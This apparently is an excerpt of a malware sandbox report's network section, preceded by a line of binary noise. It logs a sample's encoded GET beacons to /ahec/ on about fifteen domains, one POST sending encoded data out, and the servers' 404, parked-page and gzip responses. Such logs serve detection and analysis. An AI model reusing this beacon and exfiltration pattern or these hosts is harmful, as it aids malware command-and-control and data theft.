mRN0oP#mD'@j*=v=z$MA#5oK\()}aW(?!m$(i8=wg<ZOrz^<OtDZ%gYQ8@V=+V2i!NdH$HV=0(e@3WwHdBYQjz0RskbYDGn(=0@5(z"jMeZwgJa KwQ>qL%no!Y^
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=0lWeLq0ljZnDSWqNACJ6NPdmpHmas/FJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyVl134IW6OhHwJLQ==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.alldaysslimmingstea.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=9k2v98v8fW7x5mt2TD9N5hM0Gp49wMZ6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0pnZhULhTE/SFE2Bw==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.user4deepriver.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=IVKkGpXtV1toVTOD34k8KODusBBzLXjGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NJz1b7R1h7bgr87Q==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.poria.linkConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=MydpLo7WWyKQN3KVLs+v6WaBMDmZ37UnbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOkoUWHW96MRNJ3hQ==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.makeinai.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=SEtDmKR01RO/v1ckzNpTcUhCl/PMZGqFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7YIFIq1ILz0nKZVg==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.instantconvey.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=bB5JTYLqXbmN0Rh52tJaPPP1nCuGRYxCl3xm8ZfdPOYVrj3MpZEcwx/57KsfYAKqEjFN/H+DNeQWefm4mYc20p8FNjdU2pWhmA==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.domainappraisalbot.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=DTrGbTEHMG6Y4mK16jmiKUG3Xw8oKDF5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRrX+Dyau3GNz4OAA==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.nesmalt.infoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=UYUxSke5jkUMcYDNvZduqvCoEnfAlB/5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3pueYDpzLDOPRePOaEw==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.611erhm.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=pHT1kOem2IT0Y9TJ94VCHNnbNLZhsvH3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhQP0JKKbiUNKMEcA==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fam-scharf.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=AHFK2pjoxw5zzLKkvof1eZxXaE20EUKFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMnDP8n7IChKCrxhg==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.magmadokum.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=nB1qtJANgieev8TKH3dNfv3ofOkziUaCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMTKbCYScmVHGO9lg==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.thecoloringbitch.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=3lo42cEGi68x7KhWvzM1eCzYORtkkO0ycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKpO/fBLfK4Y05FeQ==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.altralogos.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=W415zxONlMY0LROHEGAnVDwgVvy34PrUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7al4cCYp0GZGyu2aw==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.77moea.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=5igDJT3zPYxoznSfOhoK1Ng2m3hD5JqRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+25ITAAVo7msZgdw==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.wrautomotive.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?XveXHZvx=kM9uZ8DSycwmMd9mOUcNXsu3ZVxRbXOcoIpBdgpgHsmMTTfOm57EajrucSnL0rM/85NSIBYnKSu3X+covYz9Y5Yt4Y8akrMm9Q==&l4xX=rDStpH0He HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.npstore.asiaConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: unknownDNS traffic detected: queries for: www.alldaysslimmingstea.com
            Source: unknownHTTP traffic detected: POST /ahec/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.user4deepriver.comOrigin: http://www.user4deepriver.comReferer: http://www.user4deepriver.com/ahec/Cache-Control: no-cacheContent-Length: 189Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 58 76 65 58 48 5a 76 78 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 78 6e 56 35 62 44 41 66 37 78 49 7a 4f 75 45 69 33 76 68 55 44 54 68 4f 64 73 2b 45 43 52 39 30 69 48 6e 4d 4a 37 56 53 61 50 61 74 71 4b 54 34 55 54 6e 36 35 71 2f 6d 67 71 6e 69 69 63 78 37 50 73 76 74 44 45 5a 65 54 44 51 7a 74 52 35 57 54 6d 6f 4b 61 6d 67 6e 52 66 53 7a 54 34 64 53 33 77 33 64 39 4f 42 67 43 51 35 57 6b 77 75 73 51 79 43 74 31 64 70 6e 63 65 52 4a 73 55 36 43 6e 68 59 78 61 57 44 34 75 45 70 63 72 6f 39 47 64 66 49 79 74 6e 69 39 75 43 55 44 70 48 30 6e 48 43 78 44 43 77 3d 3d Data Ascii: XveXHZvx=wmeP+ID8aGX5xnV5bDAf7xIzOuEi3vhUDThOds+ECR90iHnMJ7VSaPatqKT4UTn65q/mgqniicx7PsvtDEZeTDQztR5WTmoKamgnRfSzT4dS3w3d9OBgCQ5WkwusQyCt1dpnceRJsU6CnhYxaWD4uEpcro9GdfIytni9uCUDpH0nHCxDCw==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:50:19 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 21:16:32 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 08 Dec 2023 13:50:34 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 08 Dec 2023 13:50:37 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 08 Dec 2023 13:50:40 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Fri, 08 Dec 2023 13:50:42 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 08 Dec 2023 13:51:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"64f9f107-377d8"Content-Encoding: gzipData Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 